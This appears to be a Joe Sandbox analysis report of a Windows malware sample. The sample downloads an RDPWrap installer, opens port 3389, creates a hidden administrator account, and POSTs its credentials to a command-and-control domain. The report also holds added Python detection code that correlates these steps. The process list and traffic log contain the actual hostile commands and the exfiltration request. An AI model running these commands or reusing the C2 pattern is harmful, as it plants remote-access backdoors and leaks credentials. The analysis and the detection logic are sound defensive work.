                                                  Oct 8, 2024 03:30:56.116240978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116240978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116240978 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116277933 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116306067 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116322041 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116327047 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116348982 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116359949 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116375923 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116391897 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116408110 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116420031 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116425037 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116441965 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116446972 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116468906 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116477966 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116487026 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116503954 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116519928 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116529942 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116540909 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116560936 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116616011 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116632938 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116660118 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116741896 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116755009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116777897 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116848946 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116889000 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.116919994 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116966009 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116985083 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.116997957 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:30:56.117002964 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:56.117044926 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:30:59.649069071 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:30:59.653938055 CEST8049732104.26.12.205192.168.2.4
                                                  Oct 8, 2024 03:30:59.654002905 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:30:59.654155016 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:30:59.659135103 CEST8049732104.26.12.205192.168.2.4
                                                  Oct 8, 2024 03:31:00.131272078 CEST8049732104.26.12.205192.168.2.4
                                                  Oct 8, 2024 03:31:00.145018101 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.145064116 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.145438910 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.154165983 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.154179096 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.181839943 CEST4973280192.168.2.4104.26.12.205
                                                  Oct 8, 2024 03:31:00.682643890 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.682888031 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.709475994 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.709498882 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.710489035 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:00.760051012 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.927800894 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:00.971470118 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.027805090 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.028076887 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:01.028091908 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.498045921 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.498289108 CEST44349733172.67.140.92192.168.2.4
                                                  Oct 8, 2024 03:31:01.499258041 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:31:01.505897999 CEST49733443192.168.2.4172.67.140.92
                                                  Oct 8, 2024 03:32:55.117347956 CEST8049730147.45.44.104192.168.2.4
                                                  Oct 8, 2024 03:32:55.117532969 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:33:59.364049911 CEST4973080192.168.2.4147.45.44.104
                                                  Oct 8, 2024 03:33:59.364217997 CEST4973280192.168.2.4104.26.12.205
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 03:30:59.640074968 CEST | 52184 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:30:59.646816015 CEST | 53 | 52184 | 1.1.1.1 | 192.168.2.4
Oct 8, 2024 03:31:00.132900000 CEST | 51549 | 53 | 192.168.2.4 | 1.1.1.1
Oct 8, 2024 03:31:00.144526958 CEST | 53 | 51549 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 03:30:59.640074968 CEST | 192.168.2.4 | 1.1.1.1 | 0xe683 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:31:00.132900000 CEST | 192.168.2.4 | 1.1.1.1 | 0xb75d | Standard query (0) | yalubluseks.eu | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 03:30:59.646816015 CEST | 1.1.1.1 | 192.168.2.4 | 0xe683 | No error (0) | api.ipify.org | - | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:30:59.646816015 CEST | 1.1.1.1 | 192.168.2.4 | 0xe683 | No error (0) | api.ipify.org | - | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:30:59.646816015 CEST | 1.1.1.1 | 192.168.2.4 | 0xe683 | No error (0) | api.ipify.org | - | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:31:00.144526958 CEST | 1.1.1.1 | 192.168.2.4 | 0xb75d | No error (0) | yalubluseks.eu | - | 172.67.140.92 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 03:31:00.144526958 CEST | 1.1.1.1 | 192.168.2.4 | 0xb75d | No error (0) | yalubluseks.eu | - | 104.21.54.163 | A (IP address) | IN (0x0001) | false
                                                  • yalubluseks.eu
                                                  • 147.45.44.104
                                                  • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 147.45.44.104 | 80 | 6468 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:30:54.022650003 CEST | 94 | OUT | GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1
                                                  Host: 147.45.44.104
                                                  Connection: Keep-Alive
Oct 8, 2024 03:30:54.663557053 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 08 Oct 2024 01:30:54 GMT
                                                  Content-Type: application/octet-stream
                                                  Content-Length: 1785344
                                                  Last-Modified: Thu, 26 Sep 2024 12:36:03 GMT
                                                  Connection: keep-alive
                                                  Keep-Alive: timeout=120
                                                  ETag: "66f55533-1b3e00"
                                                  X-Content-Type-Options: nosniff
                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 104.26.12.205 | 80 | 6468 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe

Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 03:30:59.654155016 CEST | 63 | OUT | GET / HTTP/1.1
                                                  Host: api.ipify.org
                                                  Connection: Keep-Alive
Oct 8, 2024 03:31:00.131272078 CEST | 227 | IN | HTTP/1.1 200 OK
                                                  Date: Tue, 08 Oct 2024 01:31:00 GMT
                                                  Content-Type: text/plain
                                                  Content-Length: 11
                                                  Connection: keep-alive
                                                  Vary: Origin
                                                  CF-Cache-Status: DYNAMIC
                                                  Server: cloudflare
                                                  CF-RAY: 8cf25e6d6cdf436d-EWR
                                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                  Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49733 | 172.67.140.92 | 443 | 6468 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 01:31:00 UTC | 167 | OUT | POST /get_rdp.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Host: yalubluseks.eu
                                                  Content-Length: 58
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
2024-10-08 01:31:01 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-10-08 01:31:01 UTC | 58 | OUT | Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 75 73 65 72 3d 52 44 50 55 73 65 72 5f 32 31 37 64 35 30 37 34 26 70 61 73 73 77 6f 72 64 3d 44 55 46 36 67 29 61 41 32 61 69 42
                                                  Data Ascii: ip=8.46.123.33&user=RDPUser_217d5074&password=DUF6g)aA2aiB
2024-10-08 01:31:01 UTC | 725 | IN | HTTP/1.1 404 Not Found
                                                  Date: Tue, 08 Oct 2024 01:31:01 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  X-Content-Type-Options: nosniff
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FKkLmw5gyBr4YabzhAfntmQOBN4gs9Zy3Gu%2FXTQ6JKGe%2BM33xdwjMT4URkPeSiBDFA23xNqelbUVVPlotDBaqFDOJ1kC8GQu%2Bxm0pAVDFWJY16LqLuf3LiKgWlUyj74Zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8cf25e731d8c7cfc-EWR
                                                  92
                                                  <html>
                                                  <head><title>404 Not Found</title></head>
                                                  <body>
                                                  <center><h1>404 Not Found</h1></center>
                                                  <hr><center>nginx</center>
                                                  </body>
                                                  </html>
2024-10-08 01:31:01 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Target ID:0
                                                  Start time:21:30:52
                                                  Start date:07/10/2024
                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe"
                                                  Imagebase:0xba0000
                                                  File size:12'800 bytes
                                                  MD5 hash:5057D16E9FB573FB3924B9C3DBA53260
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:1
                                                  Start time:21:30:54
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:21:30:54
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:21:30:54
                                                  Start date:07/10/2024
                                                  Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                  Imagebase:0x400000
                                                  File size:1'785'344 bytes
                                                  MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:Borland Delphi
                                                  Yara matches:
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1688644177.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000003.00000000.1688700085.0000000000450000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 68%, ReversingLabs
                                                  • Detection: 78%, Virustotal, Browse
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:6
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\netsh.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                  Imagebase:0x7ff63cd40000
                                                  File size:96'768 bytes
                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                  Wow64 process (32bit):false
                                                  Commandline:
                                                  Imagebase:0x7ff6eef20000
                                                  File size:32'600 bytes
                                                  MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\drivers\rdpdr.sys
                                                  Wow64 process (32bit):
                                                  Commandline:
                                                  Imagebase:
                                                  File size:169'984 bytes
                                                  MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:11
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                  Wow64 process (32bit):
                                                  Commandline:
                                                  Imagebase:
                                                  File size:137'728 bytes
                                                  MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                  Has elevated privileges:
                                                  Has administrator privileges:
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:13
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:net user RDPUser_217d5074 DUF6g)aA2aiB /add
                                                  Imagebase:0x7d0000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:16
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add
                                                  Imagebase:0xca0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c net localgroup
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:18
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff70f330000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:net localgroup
                                                  Imagebase:0x7d0000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:21:30:57
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 localgroup
                                                  Imagebase:0xca0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:21
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"cmd.exe" /c net localgroup "Administrators" RDPUser_217d5074 /add
                                                  Imagebase:0x240000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:22
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:23
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:net localgroup "Administrators" RDPUser_217d5074 /add
                                                  Imagebase:0x7d0000
                                                  File size:47'104 bytes
                                                  MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:24
                                                  Start time:21:30:58
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\net1.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\system32\net1 localgroup "Administrators" RDPUser_217d5074 /add
                                                  Imagebase:0xca0000
                                                  File size:139'776 bytes
                                                  MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:21:31:00
                                                  Start date:07/10/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 2488
                                                  Imagebase:0xdf0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true
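The process list above shows the whole chain a defender needs to key on: an inbound allow rule for TCP/3389 via netsh.exe, a local account created with `net user … /add`, a `net localgroup` enumeration, and the same account added to Administrators. Each step on its own is routine administration, and netsh.exe, net.exe and RDPWrap's own RDPWInst.exe are legitimate tools, so a useful detection correlates the steps per host inside a short window rather than alerting on any one process. The following is an added example of that correlation, not code from the Joe Sandbox report: the sample events are constructed, with their command lines copied from the process list above, while the timestamps, host names (WS01, WS02) and the benign WS02 entry are assumptions.

```python
"""Correlate process-creation events into an 'RDP backdoor account' alert.

Added example, not part of the Joe Sandbox report. The command lines in
SAMPLE_EVENTS mirror the netsh / cmd / net / net1 chain in the process list;
timestamps, host names and the benign WS02 entry are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (timestamp, host, image path, command line) -- constructed sample events
SAMPLE_EVENTS = [
    ("2024-10-07 21:30:57", "WS01", r"C:\Windows\System32\netsh.exe",
     'netsh advfirewall firewall add rule name="Remote Desktop" dir=in '
     'protocol=tcp localport=3389 profile=any action=allow'),
    ("2024-10-07 21:30:57", "WS01", r"C:\Windows\SysWOW64\cmd.exe",
     '"cmd.exe" /c net user RDPUser_217d5074 DUF6g)aA2aiB /add'),
    ("2024-10-07 21:30:57", "WS01", r"C:\Windows\SysWOW64\net1.exe",
     r"C:\Windows\system32\net1 user RDPUser_217d5074 DUF6g)aA2aiB /add"),
    ("2024-10-07 21:30:57", "WS01", r"C:\Windows\SysWOW64\net.exe",
     "net localgroup"),
    ("2024-10-07 21:30:58", "WS01", r"C:\Windows\SysWOW64\net.exe",
     'net localgroup "Administrators" RDPUser_217d5074 /add'),
    ("2024-10-07 21:30:58", "WS01", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    # Assumed benign admin activity on another host: one step alone must not fire.
    ("2024-10-07 09:15:00", "WS02", r"C:\Windows\SysWOW64\net.exe",
     "net user svc_backup Summer2024! /add"),
]

# One rule per step of the chain; the named group captures the account involved.
# net.exe, net1.exe and a "cmd.exe /c net ..." wrapper all match the same rule.
RULES = {
    "firewall_rdp_allow": re.compile(
        r"netsh\s+advfirewall\s+firewall\s+add\s+rule\b"
        r"(?=.*\blocalport=3389\b)(?=.*\baction=allow\b)", re.I),
    "local_user_add": re.compile(
        r'\bnet1?(?:\.exe)?\s+user\s+"?(?P<user>[^\s"/]+)"?\s.*?/add\b', re.I),
    "admin_group_add": re.compile(
        r'\bnet1?(?:\.exe)?\s+localgroup\s+"?administrators"?\s+'
        r'"?(?P<user>[^\s"/]+)"?\s+/add\b', re.I),
}
REQUIRED = set(RULES)


def classify(cmdline):
    """Map one command line to (step, account) or None if it is not a chain step."""
    for step, rx in RULES.items():
        m = rx.search(cmdline)
        if m:
            return step, m.groupdict().get("user")
    return None


def detect_rdp_backdoor(events, window=timedelta(minutes=5)):
    """Return one alert per host where, inside `window`, a local account was
    created, that same account was added to Administrators, and an inbound
    allow rule for TCP/3389 was added. Any single step is routine admin work;
    the combination is what the sandbox process list shows."""
    hits = defaultdict(list)
    for ts, host, image, cmdline in events:
        hit = classify(cmdline)
        if hit:
            when = datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")
            hits[host].append((when, hit[0], hit[1], image))

    alerts = []
    for host, rows in hits.items():
        rows.sort(key=lambda r: r[0])
        for t0, *_ in rows:
            span = [r for r in rows if t0 <= r[0] <= t0 + window]
            if not REQUIRED <= {r[1] for r in span}:
                continue
            created = {r[2] for r in span if r[1] == "local_user_add"}
            elevated = {r[2] for r in span if r[1] == "admin_group_add"}
            users = sorted(created & elevated)  # account must appear in both steps
            if users:
                alerts.append({
                    "host": host,
                    "users": users,
                    "first_seen": span[0][0].isoformat(sep=" "),
                    "images": sorted({r[3] for r in span}),
                })
                break  # one alert per host per window
    return alerts


if __name__ == "__main__":
    for alert in detect_rdp_backdoor(SAMPLE_EVENTS):
        print(alert)
```

On the constructed input this yields a single alert for WS01 naming RDPUser_217d5074; the lone `net user … /add` on WS02 and the bare `net localgroup` enumeration are ignored. In production the events would come from Sysmon Event ID 1 or Security 4688 with command-line auditing enabled; without command-line logging none of these rules can fire, since image names alone (net.exe, netsh.exe, cmd.exe) carry no signal.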

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 552675cd16f19fe3337ddc9c5d0e157acc8c83f94d5b08c39dc651d99c76f795
                                                    • Instruction ID: ff5cb0412c2efaebce762b06c66d74b367b542fd5613600c307a5cb64f3a732b
                                                    • Opcode Fuzzy Hash: 552675cd16f19fe3337ddc9c5d0e157acc8c83f94d5b08c39dc651d99c76f795
                                                    • Instruction Fuzzy Hash: 5D21E234A502089FCB05EB78D464AAD7BF6EF9C300F20405AE501E736ACA759C45CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3518342428.0000000001410000.00000040.00000800.00020000.00000000.sdmp, Offset: 01410000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_1410000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
